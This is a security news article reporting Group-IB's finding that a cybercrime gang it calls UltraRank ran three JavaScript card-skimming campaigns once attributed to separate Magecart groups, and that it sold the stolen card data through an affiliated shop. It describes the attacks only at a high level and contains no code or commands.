New report details how previously unknown group masterminded attacks

UltraRank cybercrime gang behind payment card data thefts previously linked to Magecart

A sophisticated cybercrime group generating more than $5,000 a day via JS sniffer infections was behind a trio of campaigns attributed to separate Magecart groups.

This is according to threat intel outfit Group-IB, which today (August 27) released a report on the threat actors.

Dubbed ‘UltraRank’ by the cyber investigations firm, the gang has compromised 691 websites and 13 third-party suppliers in Europe, Asia, and North and Latin America since it was established five years ago.

Third-party victims have included marketing agencies, web design agencies, website developers, and browser notification services, the findings state.

Misattributed attacks

An investigation concluded that UltraRank was responsible for a trio of campaigns that were previously linked to separate Magecart groups.

Security researchers had misattributed the attacks because UltraRank has frequently changed its infrastructure and malicious code, according to Group-IB.

The campaigns, one of which is still active, also used different JS sniffer families: FakeLogistics, WebRank, and SnifLite.


READ MORE JavaScript sniffer slingers duke it out to control vulnerable websites


However, Group-IB’s intel analysts suspected that the attacks were the handiwork of a single actor when they noticed similarities in domain registration patterns and the mechanisms used to hide the command-and-control server’s location.

The campaigns also stored malicious code in multiple storage locations using different domain names, and launched complex supply chain attacks with single-target infections – as was the case in the attack against the website of Block & Company, North America’s largest manufacturer of cash handling products.

The investigation’s first breakthrough came in February, with the discovery that at least five websites created by US marketing company The Brandit Agency using the Magento ecommerce platform – including that of T-Mobile – had been infected with JS sniffers downloaded from the same website.

JS (JavaScript) sniffers are a form of malware designed to steal payment card data from online stores.

The number of JS sniffer families has more than doubled in under a year and a half, from 38 in March 2019 to 96 today, according to Group-IB research.

Lucrative business model

Eschewing the approach of other JS sniffer operators – buying and reselling luxury goods or cooperating with third-party carders – UltraRank instead sells card data through an affiliated card shop, ValidCC, that has similar infrastructure to the group.

During one week in 2019, the store generated daily revenues of $5,000-$7,000 from the sale of bank card data and paid $25,000-$30,000 to third-party suppliers of stolen payment data, according to the card shop’s own statistics.

The researchers linked the card shop to UltraRank after noticing that it appeared shortly before the first JS sniffer campaign was launched.

The researchers found comments posted on underground forums by ‘SPR’, purporting to be a representative of ValidCC, that claimed that most of the ill-gotten data was obtained through JS sniffer infections. This individual also alternated between posting messages in English and Russian.

‘Huge step forward’

UltraRank’s sophistication shows how cybercriminals have raised ‘customer’ service standards and are continually “fine-tuning and simplifying the instruments for solving specific tasks”, said Group-IB threat intelligence analyst Victor Okorokov in a press release promoting the report.

“JS sniffers represent a huge step forward in comparison to the previous generation of instruments for stealing money,” Victor Okorokov, a threat intelligence analyst at Group-IB, told The Daily Swig.

“Cybercriminals once used to create complex malware requiring advanced programming skills, like banking trojans, for stealing money. Apart from developing their tools, they also had to think through how to infect the targeted infrastructure, usually carefully protected.

“JS sniffers, de facto several lines of code, give cybercriminals access to the bank card data of thousands of users of e-commerce websites at once.

“JS sniffers are also distributed under the software-as-a-service model, granting folks with moderate or even lack of programming skill to conduct large-scale malicious campaigns.”


This article was updated on August 27 with comments from Group-IB.


RELATED Fila UK website ‘infected with card-skimming code’